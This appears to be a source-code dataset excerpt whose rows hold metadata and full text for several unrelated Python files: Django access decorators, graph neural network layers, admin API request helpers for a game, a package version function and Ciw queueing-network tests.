| 0.564496
| 86
| 783
| 5.139535
| 0.255814
| 0.088235
| 0.108597
| 0.20362
| 0.893665
| 0.850679
| 0.850679
| 0.850679
| 0.701357
| 0.567873
| 0
| 0.011364
| 0.325671
| 783
| 23
| 69
| 34.043478
| 0.825758
| 0
| 0
| 0.857143
| 0
| 0
| 0.003831
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
42c86c1ab5e2233c446cf26653c29d2813c6eaf6
| 1,763
|
py
|
Python
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 1
|
2021-06-11T13:47:28.000Z
|
2021-06-11T13:47:28.000Z
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 35
|
2020-06-23T11:04:44.000Z
|
2022-01-13T02:57:47.000Z
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 1
|
2020-08-04T16:17:18.000Z
|
2020-08-04T16:17:18.000Z
|
"""
This script basically allows me to use the same views for multiple users
while restricting specific aspects of the view from other users.
"""
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
def student_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
"""
Decorator for views that checks that the logged in user is a student,
redirects to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_active and u.is_student,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def lecturer_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
"""
Decorator for views that checks that the logged in user is a lecturer,
redirects to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_active and u.is_lecturer,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def admin_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
"""
Decorator for views that checks that the logged in user is an Administrator,
redirects to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_active and u.is_superuser,
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
| 33.264151
| 97
| 0.728871
| 244
| 1,763
| 5.016393
| 0.254098
| 0.138072
| 0.180556
| 0.122549
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0
| 0
| 0.20987
| 1,763
| 52
| 98
| 33.903846
| 0.878679
| 0.275099
| 0
| 0.62069
| 0
| 0
| 0.012448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0.137931
| 0.068966
| 0
| 0.37931
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
28094936a360d3b1c83455795f3dde224c5419a3
| 6,276
|
py
|
Python
|
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | 10
|
2022-01-19T19:01:35.000Z
|
2022-03-21T13:04:59.000Z
|
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | null | null | null |
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | 3
|
2022-01-11T16:21:32.000Z
|
2022-03-11T15:33:57.000Z
|
import torch
from torch import Tensor
from typing import List, Optional, Set
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.nn import MessagePassing
from holoprot.utils import get_global_agg
class WLNConvLast(MessagePassing):
def __init__(self, hsize: int, bias: bool):
super(WLNConvLast, self).__init__(aggr='mean')
self.hsize = hsize
self.bias = bias
self._build_components()
def _build_components(self):
self.W0 = nn.Linear(self.hsize, self.hsize, self.bias)
self.W1 = nn.Linear(self.hsize, self.hsize, self.bias)
self.W2 = nn.Linear(self.hsize, self.hsize, self.bias)
def forward(self, x, edge_index, edge_attr):
return self.propagate(edge_index, x=x, edge_attr=edge_attr)
def message(self, x_i, x_j, edge_attr):
mess = self.W0(x_i) * self.W1(edge_attr) * self.W2(x_j)
return mess
class WLNConv(MessagePassing):
def __init__(self,
node_fdim: int,
edge_fdim: int,
depth: int, hsize: int,
bias: bool = False,
dropout: float = 0.2,
activation: str = 'relu',
jk_pool: str = None):
super(WLNConv, self).__init__(aggr='mean') # We use mean here because the node embeddings started to explode otherwise
self.hsize = hsize
self.bias = bias
self.depth = depth
self.node_fdim = node_fdim
self.edge_fdim = edge_fdim
self.dropout_p = dropout
if activation == 'relu':
self.activation_fn = F.relu
elif activation == 'lrelu':
self.activation_fn = F.leaky_relu
self.jk_pool = jk_pool
self._build_components()
def _build_components(self):
self.node_emb = nn.Linear(self.node_fdim, self.hsize, self.bias)
self.mess_emb = nn.Linear(self.edge_fdim, self.hsize, self.bias)
self.U1 = nn.Linear(self.hsize, self.hsize, self.bias)
self.U2 = nn.Linear(self.hsize, self.hsize, self.bias)
self.V = nn.Linear(2 * self.hsize, self.hsize, self.bias)
self.dropouts = []
for i in range(self.depth):
self.dropouts.append(nn.Dropout(p=self.dropout_p))
self.dropouts = nn.ModuleList(self.dropouts)
self.conv_last = WLNConvLast(hsize=self.hsize, bias=self.bias)
def forward(self, x: Tensor, edge_index: Tensor, edge_attr: Tensor):
if x.size(-1) != self.hsize:
x = self.node_emb(x)
edge_attr = self.mess_emb(edge_attr)
x_depths = []
for i in range(self.depth):
x = self.propagate(edge_index, x=x, edge_attr=edge_attr)
x = self.dropouts[i](x)
x_depth = self.conv_last(x=x, edge_index=edge_index, edge_attr=edge_attr)
x_depths.append(x_depth)
x_final = x_depths[-1]
if self.jk_pool == 'max':
x_final = torch.stack(x_depths, dim=-1).max(dim=-1)[0]
elif self.jk_pool == "concat":
x_final = torch.cat(x_depths, dim=-1)
return x_final
def update(self, inputs: Tensor, x: Tensor) -> Tensor:
x = self.activation_fn(self.U1(x) + self.U2(inputs))
return x
def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
nei_mess = self.activation_fn(self.V(torch.cat([x_j, edge_attr], dim=-1)))
return nei_mess
class WLNResConv(MessagePassing):
def __init__(self,
node_fdim: int,
edge_fdim: int,
depth: int, hsize: int,
bias: bool = False,
dropout: float = 0.2,
activation: str = 'relu',
jk_pool: str = None):
super(WLNResConv, self).__init__(aggr='mean')
self.hsize = hsize
self.bias = bias
self.depth = depth
self.node_fdim = node_fdim
self.edge_fdim = edge_fdim
self.dropout_p = dropout
if activation == 'relu':
self.activation_fn = F.relu
elif activation == 'lrelu':
self.activation_fn = F.leaky_relu
self.jk_pool = jk_pool
self._build_components()
def _build_components(self):
self.node_emb = nn.Linear(self.node_fdim, self.hsize, self.bias)
self.mess_emb = nn.Linear(self.edge_fdim, self.hsize, self.bias)
self.U1 = nn.Linear(self.hsize, self.hsize, self.bias)
self.U2 = nn.Linear(self.hsize, self.hsize, self.bias)
self.V = nn.Linear(2 * self.hsize, self.hsize, self.bias)
self.dropouts = []
for i in range(self.depth):
self.dropouts.append(nn.Dropout(p=self.dropout_p))
self.dropouts = nn.ModuleList(self.dropouts)
self.conv_last = WLNConvLast(hsize=self.hsize, bias=self.bias)
def forward(self, x: Tensor, edge_index: Tensor, edge_attr: Tensor,
concat: bool = False):
if x.size(-1) != self.hsize:
x = self.node_emb(x)
edge_attr = self.mess_emb(edge_attr)
x_depths = []
for i in range(self.depth):
x_conv = self.propagate(edge_index, x=x, edge_attr=edge_attr)
x = x + x_conv
x = self.dropouts[i](x)
x_depth = self.conv_last(x=x, edge_index=edge_index, edge_attr=edge_attr)
x_depths.append(x_depth)
x_final = x_depths[-1]
if self.jk_pool == 'max':
x_final = torch.stack(x_depths, dim=-1).max(dim=-1)[0]
elif self.jk_pool == "concat":
x_final = torch.cat(x_depths, dim=-1)
return x_final
def update(self, inputs: Tensor, x: Tensor) -> Tensor:
x = self.activation_fn(self.U1(x) + self.U2(inputs))
return x
def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
nei_mess = self.activation_fn(self.V(torch.cat([x_j, edge_attr], dim=-1)))
return nei_mess
if __name__ == '__main__':
from holoprot.graphs.complex import MolBuilder
builder = MolBuilder(mpnn='gru')
data = builder.build("CCC")
layer = WLNConv(node_fdim=data.x.shape[-1], edge_fdim=data.edge_attr.shape[-1],
hsize=5, bias=False, depth=3)
out1, _ = layer(data.x, data.edge_index, data.edge_attr)
| 35.457627
| 126
| 0.600064
| 876
| 6,276
| 4.100457
| 0.135845
| 0.075167
| 0.079621
| 0.061526
| 0.80206
| 0.80206
| 0.797884
| 0.797884
| 0.777004
| 0.755846
| 0
| 0.008642
| 0.280911
| 6,276
| 176
| 127
| 35.659091
| 0.787281
| 0.011632
| 0
| 0.751773
| 0
| 0
| 0.011289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099291
| false
| 0.028369
| 0.056738
| 0.007092
| 0.234043
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95777a52809022b1a349e4237b045125dbd36f7c
| 6,342
|
py
|
Python
|
code/utils/requests.py
|
lordslair/singouins-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | null | null | null |
code/utils/requests.py
|
lordslair/singouins-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | 2
|
2022-03-07T05:29:02.000Z
|
2022-03-21T22:08:08.000Z
|
code/utils/requests.py
|
lordslair/singouins-docker-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf8 -*-
import json
import requests
from variables import API_URL, API_ADMIN_TOKEN, PCS_URL
def api_admin_up():
url = f'{API_URL}/admin'
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.get(url, headers=headers)
if response.status_code == 200:
if response.text:
if json.loads(response.text)['success']:
return True
else:
return False
def api_admin_user(discordname):
url = f'{API_URL}/admin/user'
payload = {'discordname': discordname}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
def api_admin_user_validate(discordname, usermail):
url = f'{API_URL}/admin/user/validate'
payload = {'discordname': discordname, 'usermail': usermail}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['success']
else:
return None
def api_admin_mypc(discordname,pcid):
url = f'{API_URL}/admin/mypc'
payload = {'discordname': discordname, 'pcid': pcid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
try:
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
except:
return None
def api_admin_mypcs(discordname):
url = f'{API_URL}/admin/mypcs'
payload = {'discordname': discordname}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
def api_admin_squad(squadid):
url = f'{API_URL}/admin/squad'
payload = {'squadid': squadid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
if json.loads(response.text)['success']:
return json.loads(response.text)['payload']
else:
return None
def api_admin_squads():
url = f'{API_URL}/admin/squads'
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.get(url, headers=headers)
if response.status_code == 200:
if response.text:
if json.loads(response.text)['success']:
return json.loads(response.text)['payload']
else:
return None
def api_admin_korp(korpid):
url = f'{API_URL}/admin/korp'
payload = {'korpid': korpid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
if json.loads(response.text)['success']:
return json.loads(response.text)['payload']
else:
return None
def api_admin_korps():
url = f'{API_URL}/admin/korps'
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.get(url, headers=headers)
if response.status_code == 200:
if response.text:
if json.loads(response.text)['success']:
return json.loads(response.text)['payload']
else:
return None
def api_admin_mypc_pa(discordname,pcid,redpa,bluepa):
url = f'{API_URL}/admin/mypc/pa'
payload = {'discordname': discordname, 'pcid': pcid, 'redpa': redpa, 'bluepa': bluepa}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
def api_admin_mypc_wallet(discordname,pcid):
url = f'{API_URL}/admin/mypc/wallet'
payload = {'discordname': discordname, 'pcid': pcid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
def api_admin_mypc_equipment(discordname,pcid):
url = f'{API_URL}/admin/mypc/equipment'
payload = {'discordname': discordname, 'pcid': pcid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
try:
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
except:
return None
def external_meta_load(type):
if type == 'weapons' or type == 'armors':
url = f'{PCS_URL}/resources/metas/{type}.json'
else:
return None
try:
response = requests.get(url)
if response.status_code == 200:
if response.text:
return json.loads(response.text)
else:
return None
except:
return None
def api_admin_mypc_stats(discordname,pcid):
url = f'{API_URL}/admin/mypc/stats'
payload = {'discordname': discordname, 'pcid': pcid}
headers = json.loads('{"Authorization": "Bearer '+ API_ADMIN_TOKEN + '"}')
try:
response = requests.post(url, json = payload, headers=headers)
if response.status_code == 200:
if response.text:
return json.loads(response.text)['payload']
else:
return None
except:
return None
| 32.690722
| 91
| 0.611637
| 726
| 6,342
| 5.217631
| 0.088154
| 0.101373
| 0.080781
| 0.099789
| 0.862724
| 0.831309
| 0.805438
| 0.797782
| 0.76188
| 0.748944
| 0
| 0.009108
| 0.255598
| 6,342
| 193
| 92
| 32.860104
| 0.793264
| 0.003154
| 0
| 0.740506
| 0
| 0
| 0.153165
| 0.040665
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.018987
| 0
| 0.316456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95a9298cd09118914f446b9ae72e03836e5c4a10
| 88
|
py
|
Python
|
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
from django_boost import __version__ as VERSION
def get_version():
return VERSION
| 14.666667
| 47
| 0.784091
| 12
| 88
| 5.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 88
| 5
| 48
| 17.6
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
95b64f2bf75c8941b8863ab457cc3e9f1e465b69
| 34,152
|
py
|
Python
|
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
import unittest
import ciw
import copy
import random
from hypothesis import given
from hypothesis.strategies import floats, integers, lists, random_module
def example_baulking_function(n):
if n < 5:
return 0.0
return 1.0
class TestServiceCentre(unittest.TestCase):
def test_init_method(self):
number_of_servers = 2
queueing_capacity = 'Inf'
class_change_matrix = [[0.2, 0.8],
[1.0, 0.0]]
schedule = None
SC = ciw.ServiceCentre(number_of_servers, queueing_capacity, class_change_matrix, schedule)
self.assertEqual(SC.number_of_servers, number_of_servers)
self.assertEqual(SC.queueing_capacity, queueing_capacity)
self.assertEqual(SC.class_change_matrix, class_change_matrix)
self.assertEqual(SC.schedule, schedule)
self.assertFalse(SC.preempt)
@given(number_of_servers=integers(min_value=1),
queueing_capacity=integers(min_value=0),
class_change_prob1=floats(min_value=0.0, max_value=1.0),
class_change_prob2=floats(min_value=0.0, max_value=1.0))
def test_init_method_h(self, number_of_servers, queueing_capacity, class_change_prob1, class_change_prob2):
class_change_matrix = [[class_change_prob1,
1 - class_change_prob1],
[class_change_prob2,
1 - class_change_prob2]]
schedule = None
SC = ciw.ServiceCentre(number_of_servers, queueing_capacity, class_change_matrix, schedule)
self.assertEqual(SC.number_of_servers, number_of_servers)
self.assertEqual(SC.queueing_capacity, queueing_capacity)
self.assertEqual(SC.class_change_matrix, class_change_matrix)
self.assertEqual(SC.schedule, schedule)
self.assertFalse(SC.preempt)
class TestCustomerClass(unittest.TestCase):
def test_init_method(self):
arrival_distributions = [["Uniform", 4.0, 9.0],
["Exponential", 5],
["Gamma", 0.6, 1.2]]
service_distributions = [["Gamma", 4.0, 9.0],
["Uniform", 0.6, 1.2],
["Exponential", 5]]
transition_matrix = [[.2, .6, .2], [0, 0, 0], [.5, 0, 0]]
priority_class = 2
baulking_functions = [None, None, example_baulking_function]
batching_distributions = [['Deterministic', 1],
['Deterministic', 1],
['Deterministic', 1]]
CC = ciw.CustomerClass(arrival_distributions, service_distributions, transition_matrix, priority_class, baulking_functions, batching_distributions)
self.assertEqual(CC.arrival_distributions, arrival_distributions)
self.assertEqual(CC.service_distributions, service_distributions)
self.assertEqual(CC.batching_distributions, batching_distributions)
self.assertEqual(CC.transition_matrix, transition_matrix)
self.assertEqual(CC.priority_class, priority_class)
# check baulking function works
self.assertEqual(CC.baulking_functions[2](0), 0.0)
self.assertEqual(CC.baulking_functions[2](1), 0.0)
self.assertEqual(CC.baulking_functions[2](2), 0.0)
self.assertEqual(CC.baulking_functions[2](3), 0.0)
self.assertEqual(CC.baulking_functions[2](4), 0.0)
self.assertEqual(CC.baulking_functions[2](5), 1.0)
self.assertEqual(CC.baulking_functions[2](6), 1.0)
self.assertEqual(CC.baulking_functions[2](7), 1.0)
self.assertEqual(CC.baulking_functions[2](8), 1.0)
class TestNetwork(unittest.TestCase):
def test_init_method(self):
number_of_servers = 2
queueing_capacity = 'Inf'
schedule = None
class_change_matrix = [[0.2, 0.8],
[1.0, 0.0]]
arrival_distributions = [["Uniform", 4.0, 9.0],
["Exponential", 5.0],
["Gamma", 0.6, 1.2]]
service_distributions = [["Gamma", 4.0, 9.0],
["Uniform", 0.6, 1.2],
["Exponential", 5]]
transition_matrix = [[0.2, 0.6, 0.2],
[0.0, 0.0, 0.0],
[0.5, 0.0, 0.0]]
priority_class = 0
batching_distributions = [['Deterministic', 1],
['Deterministic', 1],
['Deterministic', 1]]
baulking_functions = [None, None, example_baulking_function]
service_centres = [ciw.ServiceCentre(number_of_servers,
queueing_capacity,
class_change_matrix,
schedule) for i in range(4)]
customer_classes = [ciw.CustomerClass(arrival_distributions,
service_distributions,
transition_matrix,
priority_class,
baulking_functions,
batching_distributions) for i in range(2)]
N = ciw.Network(service_centres, customer_classes)
self.assertEqual(N.service_centres, service_centres)
self.assertEqual(N.customer_classes, customer_classes)
self.assertEqual(N.number_of_nodes, 4)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0, 1:0})
def test_create_network_from_dictionary(self):
params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]]},
'Service_distributions': {'Class 0': [['Exponential', 7.0]]},
'Number_of_servers': [9],
'Transition_matrices': {'Class 0': [[0.5]]},
'Queue_capacities': ['Inf']}
N = ciw.create_network_from_dictionary(params)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
params = {'Arrival_distributions': [['Exponential', 3.0],
['Uniform', 0.2, 0.6]],
'Service_distributions': [['Exponential', 7.0],
['Deterministic', 0.7]],
'Number_of_servers': [[[1, 20], [4, 50]], 3],
'Transition_matrices': [[0.5, 0.2],
[0.0, 0.0]],
'Queue_capacities': [10, 'Inf']
}
N = ciw.create_network_from_dictionary(params)
self.assertEqual(N.number_of_nodes, 2)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, 10)
self.assertEqual(N.service_centres[0].number_of_servers, 'schedule')
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, [[1, 20], [4, 50]])
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 3)
self.assertEqual(N.service_centres[1].class_change_matrix, None)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Uniform', 0.2, 0.6]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Deterministic', 0.7]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.2], [0.0, 0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
'Service_distributions': {'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
'Number_of_servers': [9],
'Transition_matrices': {'Class 0': [[0.5]],
'Class 1': [[0.0]]},
'Queue_capacities': ['Inf'],
'Class_change_matrices': {'Node 1': [[0.0, 1.0],
[0.2, 0.8]]}}
N = ciw.create_network_from_dictionary(params)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, [[0.0, 1.0], [0.2, 0.8]])
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0, 1:0})
params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
'Service_distributions': {'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
'Number_of_servers': [9],
'Transition_matrices': {'Class 0': [[0.5]],
'Class 1': [[0.0]]},
'Queue_capacities': ['Inf'],
'Priority_classes': {'Class 0': 1,
'Class 1': 0}}
N = ciw.create_network_from_dictionary(params)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.customer_classes[0].priority_class, 1)
self.assertEqual(N.customer_classes[1].priority_class, 0)
self.assertEqual(N.number_of_priority_classes, 2)
self.assertEqual(N.priority_class_mapping, {0:1, 1:0})
params = {'Arrival_distributions': [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]],
'Service_distributions': [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]],
'Number_of_servers': [9, 2, 4],
'Transition_matrices': [[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]],
'Queue_capacities': ['Inf', 'Inf', 'Inf'],
'Baulking_functions': [None, None, example_baulking_function]}
N = ciw.create_network_from_dictionary(params)
self.assertEqual(N.number_of_nodes, 3)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 2)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.service_centres[2].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[2].number_of_servers, 4)
self.assertEqual(N.service_centres[2].schedule, None)
self.assertFalse(N.service_centres[2].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]])
self.assertEqual(N.customer_classes[0].baulking_functions, [None, None, example_baulking_function])
self.assertEqual(N.number_of_priority_classes, 1)
def test_create_network_from_yml(self):
N = ciw.create_network_from_yml(
'ciw/tests/testing_parameters/params.yml')
self.assertEqual(N.number_of_nodes, 4)
self.assertEqual(N.number_of_classes, 3)
self.assertEqual(N.service_centres[0].queueing_capacity, 20)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[2].queueing_capacity, 30)
self.assertEqual(N.service_centres[3].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[1].number_of_servers, 10)
self.assertEqual(N.service_centres[2].number_of_servers, 8)
self.assertEqual(N.service_centres[3].number_of_servers, 8)
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[1].class_change_matrix, None)
self.assertEqual(N.service_centres[2].class_change_matrix, None)
self.assertEqual(N.service_centres[3].class_change_matrix, None)
